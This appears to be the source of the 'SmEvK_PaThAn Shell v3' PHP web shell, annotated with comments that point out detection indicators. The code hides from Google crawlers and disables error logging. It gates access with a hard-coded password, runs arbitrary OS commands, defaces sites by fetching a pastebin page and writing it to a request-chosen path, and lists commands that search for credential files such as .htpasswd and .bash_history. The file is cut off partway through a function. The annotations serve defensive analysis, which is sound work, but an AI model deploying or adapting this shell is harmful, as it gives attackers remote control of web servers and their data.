  1. <?php
  2. /*
  3.  
  4. 1337 H3r3.. <3
  5. Edit Shell according to your choice.
  6. Domain read bypass.
  7. Enjoy!
  8.  
  9. */
  // Operator-editable settings. Every value in this run is a static string stored in the
  // file on disk, so these lines are practical content-match candidates during triage.
  10. //Make your setting here.
  // Remote page that the 'deface' handler later in this file fetches with file_get_contents()
  // and writes to a request-chosen path. An outbound fetch of this URL made by the web
  // server itself is a network indicator.
  11. $deface_url = 'http://pastebin.com/raw.php?i=FHfxsFGT'; //deface url here(pastebin).
  // Username and password are kept in cleartext in the source and compared with the
  // 'uname' / 'pass' POST fields by the login gate. They are the values published with the
  // sample, so access to a planted copy is not limited to the party that planted it.
  12. $UserName = "1337"; //Your UserName here.
  13. $auth_pass = "1337"; //Your Password.
  14. //Change Shell Theme here//
  // Presentation only: printHeader() declares these three as globals and interpolates
  // them into the CSS it emits.
  15. $color = "#ABEFFF"; //Fonts color modify here.
  16. $Theme = '#09B5A6'; //Change border-color accoriding to your choice.
  17. $TabsColor = '#0E5061'; //Change tabs color here.
  18. #-------------------------------------------------------------------------------
  19.  
  20. ?>
  21. <?php
  22.  
  // Request bootstrap. This run executes on every hit, before the login gate below.
  // The consumer of $default_action is outside the visible part of the file.
  23. $default_action = 'FilesMan';
  24. @define('SELF_PATH', __FILE__);
  // Cloaking: any request whose User-Agent contains 'Google' receives a bare 404 and the
  // script stops, so the file looks absent to that crawler. A single crawler-style probe
  // is therefore not sufficient to rule a suspected path in or out.
  25. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  26. header('HTTP/1.0 404 Not Found');
  27. exit;
  28. }
  29.  
  // Anti-logging: error reporting, display and logging are switched off, error_log is
  // cleared and the execution time limit is removed. From here on the PHP error log is not
  // a reliable record of what this script did; use web-server access logs and file-system
  // timestamps instead.
  30. @session_start();
  31. @error_reporting(0);
  32. @ini_set('error_log',NULL);
  33. @ini_set('display_errors',0);
  34. @ini_set('log_errors',0);
  35. @ini_set('max_execution_time',0);
  36. @set_time_limit(0);
  // set_magic_quotes_runtime() and get_magic_quotes_gpc() were removed from PHP in 7.0 and
  // 8.0 respectively, which dates this code to the PHP 5 era.
  37. @set_magic_quotes_runtime(0);
  38. if( get_magic_quotes_gpc() ) {
  // Recursively applies stripslashes() to a scalar or to every leaf of a nested array.
  39. function stripslashes_array($array) {
  40. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  41. }
  // Undoes magic-quotes escaping on the whole POST body before any handler reads it.
  42. $_POST = stripslashes_array($_POST);
  43. }
  44.  
  // Renders the stand-alone login page and ends the request with exit.
  // The form posts the fields 'uname', 'pass' and 'login' back to the same URL.
  // The page title, the heading text and the logo URL are fixed strings in the markup below
  // and can serve as content-match candidates. The font and the logo are loaded from
  // third-party hosts by the browser of whoever opens the page, not by the server.
  45. function printLogin() {
  46. if ($_POST['pass'] != $auth_pass && $_POST['uname'] != $UserName) {
  47. $status = 'Wrong Password or UserName :(';
  48.  
  49.  
  50. }
  51.  
  52. ?>
  53.  
  54. <html>
  55. <head>
  56. <title>SmEvK v3</title>
  57. <link href="https://fonts.googleapis.com/css?family=Josefin+Sans:400,100" rel="stylesheet">
  58. </head>
  59. <style>
  60. body{
  61. font-family: Josefin Sans, sans-serif;
  62. background: black;
  63. color:#ABEFFF;
  64. }
  65. .loginpage img{
  66. width: 500px;
  67. height: 150px;
  68. }
  69. .loginpage{
  70. height: 400px;
  71. width: 500px;
  72. border:1px solid;
  73. border-color:#ABEFFF;
  74. text-align: center;
  75. border-radius: 5px;
  76. margin-top: 100px;
  77. }
  78. #pageheading{
  79. font-size:25px;
  80. color:#ABEFFF;
  81. margin-top: 10px;
  82. }
  83. .loginpage img{
  84. width: 500px;
  85.  
  86. }
  87. input{
  88. background: black;
  89. border-color:#ABEFFF;
  90. border-radius: 10px;
  91. margin-top: 10px;
  92. padding:5px;
  93. color: #ABEFFF;
  94. }
  95. input:hover{
  96. background: #ABEFFF;
  97. color: red;
  98.  
  99. }
  100.  
  101. </style>
  102. <body>
  103. <center>
  104. <div class="loginpage">
  105. <img src="http://i63.tinypic.com/1108vic.jpg" alt="Smevk Logo">
  106. <div id="pageheading">SmEvK_PaThAn Shell V3</div>
  107. <form method="post">
  108. User Name: <input type="text" name="uname" ><br>
  109. Password : <input type="password" name="pass" ><br>
  110. <input type="submit" name="login" value="Login">
  111. <?php
  112.  
  // The closing markup below is emitted only when $status was set by the check above.
  113. if (isset($status)) {
  114. ?>
  115.  
  116.  
  117.  
  118.  
  119. </form>
  120.  
  121. </d<p><?=$status?></p>
  122. </center>
  123. </body>
  124. </html>
  125.  
  126. <?php
  127.  
  128.  
  129. }
  // Nothing after the login page runs for this request.
  130. exit;
  131. }
  132.  
  // Login gate. The session flag is keyed by md5() of the Host request header. It is set
  // when $auth_pass is empty (no authentication at all) or when the POST fields 'pass' and
  // 'uname' loosely equal (==) the hard-coded values; otherwise printLogin() ends the request.
  // In access logs the login is a POST to this file carrying 'uname', 'pass' and 'login'.
  133. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  134. if( empty( $auth_pass ) ||
  135. ( isset( $_POST['pass'] ) && ($_POST['pass']) == $auth_pass && ($_POST['uname']) == $UserName))
  136. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  137.  
  138. else
  139.  
  140. printLogin();
  141.  
  // Platform detection: 'win' when PHP_OS starts with "win" (case-insensitive), else 'nix'.
  142. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  143. $os = 'win';
  144. else
  145. $os = 'nix';
  146. $safe_mode = @ini_get('safe_mode');
  147. $disable_functions = @ini_get('disable_functions');
  // $home_cwd keeps the directory the script started in; the working directory is then
  // switched to whatever the POST field 'c' names, with no restriction on the path.
  148. $home_cwd = @getcwd();
  149. if( isset( $_POST['c'] ) )
  150. @chdir($_POST['c']);
  151. $cwd = @getcwd();
  // Normalise both paths to forward slashes on Windows and make $cwd end with '/'.
  152. if( $os == 'win') {
  153. $home_cwd = str_replace("\\", "/", $home_cwd);
  154. $cwd = str_replace("\\", "/", $cwd);
  155. }
  156. if( $cwd[strlen($cwd)-1] != '/' )
  157. $cwd .= '/';
  158.  
  // Label => command table of canned reconnaissance commands, one set per platform.
  // The code that runs them is outside the visible part of the file.
  // The strings cover network state, account listings, SUID/SGID and world-writable files,
  // and credential-bearing files (.htpasswd, .bash_history, .mysql_history, config*).
  // These exact command lines, run by the web-server account, are useful patterns for
  // process-audit rules, and entries with an empty command ("Find", "Locate") are group headings.
  159. if($os == 'win') {
  160. $aliases = array(
  161. "List Directory" => "dir",
  162. "Find index.php in current dir" => "dir /s /w /b index.php",
  163. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  164. "Show active connections" => "netstat -an",
  165. "Show running services" => "net start",
  166. "User accounts" => "net user",
  167. "Show computers" => "net view",
  168. "ARP Table" => "arp -a",
  169. "IP Configuration" => "ipconfig /all"
  170. );
  171. } else {
  172. $aliases = array(
  173. "List dir" => "ls -la",
  174. "list file attributes on a Linux second extended file system" => "lsattr -va",
  175. "show opened ports" => "netstat -an | grep -i listen",
  176. "Find" => "",
  177. "find all suid files" => "find / -type f -perm -04000 -ls",
  178. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  179. "find all sgid files" => "find / -type f -perm -02000 -ls",
  180. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  181. "find config.inc.php files" => "find / -type f -name config.inc.php",
  182. "find config* files" => "find / -type f -name \"config*\"",
  183. "find config* files in current dir" => "find . -type f -name \"config*\"",
  184. "find all writable folders and files" => "find / -perm -2 -ls",
  185. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  186. "find all service.pwd files" => "find / -type f -name service.pwd",
  187. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  188. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  189. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  190. "find all .bash_history files" => "find / -type f -name .bash_history",
  191. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  192. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  193. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  194. "Locate" => "",
  195. "locate httpd.conf files" => "locate httpd.conf",
  196. "locate vhosts.conf files" => "locate vhosts.conf",
  197. "locate proftpd.conf files" => "locate proftpd.conf",
  198. "locate psybnc.conf files" => "locate psybnc.conf",
  199. "locate my.conf files" => "locate my.conf",
  200. "locate admin.php files" =>"locate admin.php",
  201. "locate cfg.php files" => "locate cfg.php",
  202. "locate conf.php files" => "locate conf.php",
  203. "locate config.dat files" => "locate config.dat",
  204. "locate config.php files" => "locate config.php",
  205. "locate config.inc files" => "locate config.inc",
  206. "locate config.inc.php" => "locate config.inc.php",
  207. "locate config.default.php files" => "locate config.default.php",
  208. "locate config* files " => "locate config",
  209. "locate .conf files"=>"locate '.conf'",
  210. "locate .pwd files" => "locate '.pwd'",
  211. "locate .sql files" => "locate '.sql'",
  212. "locate .htpasswd files" => "locate '.htpasswd'",
  213. "locate .bash_history files" => "locate '.bash_history'",
  214. "locate .mysql_history files" => "locate '.mysql_history'",
  215. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  216. "locate backup files" => "locate backup",
  217. "locate dump files" => "locate dump",
  218. "locate priv files" => "locate priv"
  219. );
  220. }
  // 'deface' handler: when the POST field p1 equals 'deface', the body of $deface_url is
  // downloaded and written to the path formed by concatenating the POST fields c and p2.
  // Host-side traces are an outbound HTTP fetch by the PHP process followed by a write to
  // served content; file-integrity monitoring on the web root catches the result.
  221. if(isset($_POST['p1']) && $_POST['p1']=='deface') {
  222.  
  223. $def = file_get_contents($deface_url);
  224. file_put_contents($_POST['c'].$_POST['p2'],$def);
  225. }
  // Runs the string $in as an operating-system command and returns its captured output.
  // It uses the first available of exec, passthru, system, shell_exec and popen, in that
  // order, and returns '' when none applies. A disable_functions policy has to name all
  // five to stop this helper; blocking only some leaves the later branches usable.
  // Every branch starts a child process under the web-server account, which is the event
  // that process auditing should alert on.
  226. function ex($in) {
  227. $out = '';
  228. if(function_exists('exec')) {
  // exec() fills $out with an array of output lines, joined back into one string.
  229. @exec($in,$out);
  230. $out = @join("\n",$out);
  231. }elseif(function_exists('passthru')) {
  // passthru() and system() write straight to output, so it is captured via output buffering.
  232. ob_start();
  233. @passthru($in);
  234. $out = ob_get_clean();
  235. }elseif(function_exists('system')) {
  236. ob_start();
  237. @system($in);
  238. $out = ob_get_clean();
  239. }elseif(function_exists('shell_exec')) {
  240. $out = shell_exec($in);
  241. }elseif(is_resource($f = @popen($in,"r"))) {
  // Last resort: read the pipe in 1024-byte chunks until end of file.
  242. $out = "";
  243. while(!@feof($f))
  244. $out .= fread($f,1024);
  245. pclose($f);
  246. }
  247. return $out;
  248. }
  249.  
  // Looks up a program on the host by running `which <name>` through ex().
  // Returns the command's output when it is non-empty, otherwise false.
  // $p is concatenated into the command line unquoted; every visible caller in this file
  // passes names from hard-coded lists.
  250. function which($p) {
  251. $path = ex('which '.$p);
  252. if(!empty($path))
  253. return $path;
  254. return false;
  255. }
  256.  
  // Emits the page shell (CSS, client-side JS, hidden control form) and a host-summary banner.
  // Reads the globals $color, $Theme, $TabsColor, $cwd, $home_cwd, $os, $safe_mode, $auth_pass.
  // The hidden form 'mf' carries the fields a, c, p1, p2, p3 and charset. The JS helper g()
  // fills them and submits the form by POST, and a() sends the same fields plus ajax=true to
  // REQUEST_URI, so use of this page appears in access logs as repeated POSTs to one path.
  // processReqChange() hands part of the AJAX response body to eval() in the browser.
  // The emitted page references assets on third-party hosts (fonts.googleapis.com,
  // downloads.totallyfreecursors.com, cur.cursors-4u.net, www.cursors-4u.com, i63.tinypic.com).
  // Those requests come from the browser of whoever opens the page, not from the server.
  257. function printHeader() {
  258. if(empty($_POST['charset']))
  259. $_POST['charset'] = "UTF-8";
  260. global $color;
  261. global $Theme;
  262. global $TabsColor;
  263. echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>";
  264. echo '<html>
  265. <meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>SmEvK v3</title>
  266. <style>
  267. body {background-color:black;color:#fff;}
  268. body,td,th { font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }
  269. span,h1,a { color:'.$color.' !important; }
  270. span { font-weight: bolder; }
  271. h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
  272. div.content { padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.$Theme.'; border-radius:5px;}
  273. a { text-decoration:none; }
  274. a:hover { border-bottom:0px solid #5e5e5e;text-decoration:none; }
  275. a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;text-decoration:none;}
  276. .ml1 { border:1px solid '.$Theme.';padding:px;margin:0;overflow: auto; }
  277. .bigarea { width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.$Theme.'; background:#2F2F2F;}
  278. input, textarea, select { margin-top:0;color:#63E1FF;background-color:black;border-radius:5px;border:1px solid '.$Theme.'; border-radis:5px;font: 10pt arial,"Courier New"; }
  279. input[type="button"]:hover,input[type="submit"]:hover {background-color:#094F60;color:black;text-decoration:none;}
  280. form { margin:0px; background:#0F1010;}
  281. #toolsTbl { text-align:center; }
  282. .toolsInp { width: 80%; background:black; border-radius:5px; border-color:'.$Theme.'; }
  283. .main th {text-align:left;background-color:'.$TabsColor.';}
  284. .main tr:hover{background:'.$Theme.'; border:5px solid;border-color:'.$Theme.';}
  285. .main td, th{vertical-align:middle;}
  286. .menu { height:30px; border-radius:10px;}
  287. .menu th{padding:1px;border-radius: 5px; background:'.$TabsColor.'; -webkit-transform: rotate(20deg);
  288. -moz-transform: rotate(20deg);
  289. -o-transform: rotate(20deg);
  290. -ms-transform: rotate(20deg);
  291. transform: rotate(20deg);}
  292. .menu th:hover{background:#0F1010;text-decoration: none;}
  293. pre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}
  294. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  295.  
  296.  
  297. .cpr {margin-bottom:5px;font-weight:bold; }
  298. .cpb {width:34px;margin:0 5px;}
  299.  
  300. .npoad td {padding:0;}
  301. #Smevktools{
  302. margin-top:50px;
  303. width:500px;
  304. border:1px solid;
  305. border-radius:10px;
  306. }
  307. .smevklogo td{
  308. font-size:12px;
  309. font-weight:bold;
  310.  
  311.  
  312.  
  313. }
  314. .smevklogo{
  315. margin-left:5px;
  316. background:url(http://i63.tinypic.com/1108vic.jpg);
  317. background-repeat: no-repeat;
  318. background-position: CENTER;
  319. background-color:#0F1010;
  320. background-size: 400px 120px;
  321.  
  322.  
  323.  
  324. }
  325. </style>
  326.  
  327. </html>
  328. <style type="text/css">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
  329. <script>
  330. function set(a,c,p1,p2,p3,charset) {
  331. if(a != null)document.mf.a.value=a;
  332. if(c != null)document.mf.c.value=c;
  333. if(p1 != null)document.mf.p1.value=p1;
  334. if(p2 != null)document.mf.p2.value=p2;
  335. if(p3 != null)document.mf.p3.value=p3;
  336. if(charset != null)document.mf.charset.value=charset;
  337. }
  338. function g(a,c,p1,p2,p3,charset) {
  339. set(a,c,p1,p2,p3,charset);
  340. document.mf.submit();
  341. }
  342. function a(a,c,p1,p2,p3,charset) {
  343. set(a,c,p1,p2,p3,charset);
  344. var params = "ajax=true";
  345. for(i=0;i<document.mf.elements.length;i++)
  346. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  347. sr("'.$_SERVER['REQUEST_URI'].'", params);
  348. }
  349. function sr(url, params) {
  350. if (window.XMLHttpRequest) {
  351. req = new XMLHttpRequest();
  352. req.onreadystatechange = processReqChange;
  353. req.open("POST", url, true);
  354. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  355. req.send(params);
  356. }
  357. else if (window.ActiveXObject) {
  358. req = new ActiveXObject("Microsoft.XMLHTTP");
  359. if (req) {
  360. req.onreadystatechange = processReqChange;
  361. req.open("POST", url, true);
  362. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  363. req.send(params);
  364. }
  365. }
  366. }
  367. function processReqChange() {
  368. if( (req.readyState == 4) )
  369. if(req.status == 200) {
  370. //alert(req.responseText);
  371. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  372. var arr=reg.exec(req.responseText);
  373. eval(arr[2].substr(0, arr[1]));
  374. }
  375. else alert("Request error!");
  376. }
  377. </script>
  378. <head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
  379. <form method=post name=mf style="display:none;">
  380. <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
  381. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  382. <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
  383. <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
  384. <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
  385. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  386. </form>';
  // Host summary for the banner: disk usage of the current directory, kernel name and
  // release, and the effective user and group of the PHP process.
  387. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  388. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  // Guard against division by zero in the percentage shown in the banner.
  389. $totalSpace = $totalSpace?$totalSpace:1;
  390. $disable_functions = @ini_get('disable_functions');
  391. $release = @php_uname('r');
  392. $kernel = @php_uname('s');
  393. if(!function_exists('posix_getegid')) {
  394. $user = @get_current_user();
  395. $uid = @getmyuid();
  396. $gid = @getmygid();
  397. $group = "?";
  398. } else {
  399. $uid = @posix_getpwuid(@posix_geteuid());
  400. $gid = @posix_getgrgid(@posix_getegid());
  401. $user = $uid['name'];
  402. $uid = $uid['uid'];
  403. $group = $gid['name'];
  404. $gid = $gid['gid'];
  405. }
  // Breadcrumb: one link per component of the current directory, each navigating to that prefix.
  406. $cwd_links = '';
  407. $path = explode("/", $GLOBALS['cwd']);
  408. $n=count($path);
  409. for($i=0;$i<$n-1;$i++) {
  410. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  411. for($j=0;$j<=$i;$j++)
  412. $cwd_links .= $path[$j].'/';
  413. $cwd_links .= "\")'>".$path[$i]."/</a>";
  414. }
  415. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  416. $opt_charsets = '';
  417. foreach($charsets as $item)
  418. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  // Menu label => action name. The action names are the values posted in field 'a' and are
  // fixed strings suitable for request-body or file-content matching.
  419. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','String tools'=>'StringTools','Import Scripts'=>'ImportScripts','Network'=>'Network','Readable Dirs'=>'Readable','Defacer' => 'Deface','Code Injector'=>'Injector','Domains' => 'Domain');
  420. if(!empty($GLOBALS['auth_pass']))
  421. $m['Logout'] = 'Logout';
  422. $menu = '';
  423. foreach($m as $k => $v)
  424. $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
  // On Windows, probe drive letters a: to z: and list the ones that exist.
  425. $drives = "";
  426. if ($GLOBALS['os'] == 'win') {
  427. foreach( range('a','z') as $drive ){
  428. if (is_dir($drive.':\\'))
  429. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  430. }
  431. $drives .= '<br />: ';
  432. }
  // On other hosts, count hosted domains from the zone entries in /etc/named.conf, falling
  // back to the number of directory entries in /var/named when that file cannot be read.
  433. if($GLOBALS['os'] == 'nix') {
  434. $dominios = @file_get_contents("/etc/named.conf");
  435. if(!$dominios) {
  436. $DomainS = "/var/named";
  437. $Domainonserver = scandir($DomainS);
  438. $d0c = count($Domainonserver);
  439. } else {
  440. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  441. $out = sizeof(array_unique($out[1]));
  442. $d0c = $out." Domains";
  443. }
  444. } else {
  445. $d0c = "Nothing here bro:(";
  446. }
  // Tool inventory: when safe_mode is off, each name below is looked up with which(), i.e. one
  // `which` child process per name every time this header is rendered. On a monitored host
  // that is likely to show as a burst of short-lived processes owned by the web-server account.
  447. if($GLOBALS['os'] == 'nix' )
  448. {
  449. $usefl = ''; $dwnldr = '';
  450. if(!@ini_get('safe_mode')) {
  451. $temp = array();
  452. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  453. foreach($userful as $item) { if(which($item)) $temp[]= $item; }
  454. $usefl = implode(', ',$temp);
  455. $temp = array();
  456. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  457. foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
  458. $dwnldr = implode(', ',$temp);
  459. } else {
  460. $usefl = ' ------- '; $dwnldr = ' ------- ';
  461. }
  462. } else {
  463. $usefl = ' ------- '; $dwnldr = ' ------- ';
  464. }
  // Banner output: uname, user and group, server software, tool inventory, disabled functions,
  // current directory, server and client IP, disk figures, PHP version, safe_mode state,
  // domain count, then the action menu.
  465. echo '<div class="smevklogo"><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr>
  466. <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
  467. <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
  468. '<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
  469. '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table></div>'.
  470. '</div></div><div style="margin:5;background:black;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:black;">';
  471. }
  472.  
  // Emits the footer tool panel and closes the page.
  // The panel holds six forms: change directory, read file, make directory, make file,
  // execute command and upload file. The first five hand their value to the JS helper g(),
  // which posts the action names 'FilesMan', 'FilesTools' or 'Console'. The upload form posts
  // multipart/form-data with a='FilesMAn' and p1='uploadFile'.
  // The credit line and profile URL at the end are fixed strings in the emitted HTML.
  473. function printFooter() {
  // Shows whether the PHP process can write to the current directory.
  474. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  475.  
  476. echo '</div><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
  477. <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
  478. <tr>
  479. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
  480. <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  481. </tr>
  482. <tr>
  483. <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
  484. <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  485. </tr>
  486. <tr>
  487. <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  488. <td><form method="post" ENCTYPE="multipart/form-data">
  489. <input type=hidden name=a value="FilesMAn">
  490. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  491. <input type=hidden name=p1 value="uploadFile">
  492. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  493. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  494. </tr>
  495. </table></div></div>
  496. <div style="margin:5px;background:black;"><div class="content" style="border:2px solid '.$Theme.';text-align:center;font-weight:bold; border-radius:10px;margin:auto; width:500;">SmEvK_PaThAn Shell v3 coded by <a href="https://www.facebook.com/smevkpathan"> Kashif Khan</a></div></div>
  497. </div>
  498. </body></html>';
  499. }
  500.  
  // Stand-ins for posix_getpwuid() and posix_getgrgid(). Each is defined only when the real
  // function is missing and its name does not occur in the disable_functions setting, and
  // each returns false, so later lookups of owner and group names yield no name.
  501. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  502. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  503.  
  504.  
  /**
   * Formats a byte count for display.
   *
   * Values of at least 1024 are scaled to the largest fitting binary unit (KB, MB, GB)
   * and printed with two decimals; smaller values are printed as-is with a " B" suffix.
   *
   * @param mixed $s Byte count.
   * @return string Human-readable size.
   */
  function viewSize($s) {
      // Largest unit first so the first threshold that fits wins.
      $units = array(
          ' GB' => 1073741824,
          ' MB' => 1048576,
          ' KB' => 1024,
      );
      foreach ($units as $suffix => $threshold) {
          if ($s >= $threshold) {
              return sprintf('%1.2f', $s / $threshold) . $suffix;
          }
      }
      return $s . ' B';
  }
  515.  
  /**
   * Renders a numeric file mode as a ten-character, ls-style permission string.
   *
   * The first character is the file type (s, l, -, b, d, c, p, or u when no type mask
   * matches); the remaining nine are the owner, group and other triads, with setuid and
   * setgid shown as s/S and the sticky bit as t/T.
   *
   * @param mixed $p Mode bits, as returned by fileperms().
   * @return string Permission string such as "-rw-r--r--".
   */
  function perms($p) {
      // Type masks in test order: the first mask whose bits are all set decides the letter.
      $typeMasks = array(
          0xC000 => 's',
          0xA000 => 'l',
          0x8000 => '-',
          0x6000 => 'b',
          0x4000 => 'd',
          0x2000 => 'c',
          0x1000 => 'p',
      );
      $text = 'u';
      foreach ($typeMasks as $mask => $letter) {
          if (($p & $mask) == $mask) {
              $text = $letter;
              break;
          }
      }

      // One row per triad: read bit, write bit, execute bit, special bit, and the two
      // letters used for the special bit with and without execute.
      $triads = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
      );
      foreach ($triads as $row) {
          list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $row;
          $text .= ($p & $readBit) ? 'r' : '-';
          $text .= ($p & $writeBit) ? 'w' : '-';
          if ($p & $execBit) {
              $text .= ($p & $specialBit) ? $withExec : 'x';
          } else {
              $text .= ($p & $specialBit) ? $withoutExec : '-';
          }
      }
      return $text;
  }
  536.  
  /**
   * Wraps the permission string of a path in a colour-coded <font> tag.
   *
   * Red (#FF0000) when the path is not readable, white when it is readable but not
   * writable, green (#00BB00) when it is both.
   *
   * @param string $f Path to inspect.
   * @return string HTML fragment containing the perms() rendering of the path's mode.
   */
  function viewPermsColor($f) {
      if (!@is_readable($f)) {
          $shade = '#FF0000';
      } elseif (!@is_writable($f)) {
          $shade = 'white';
      } else {
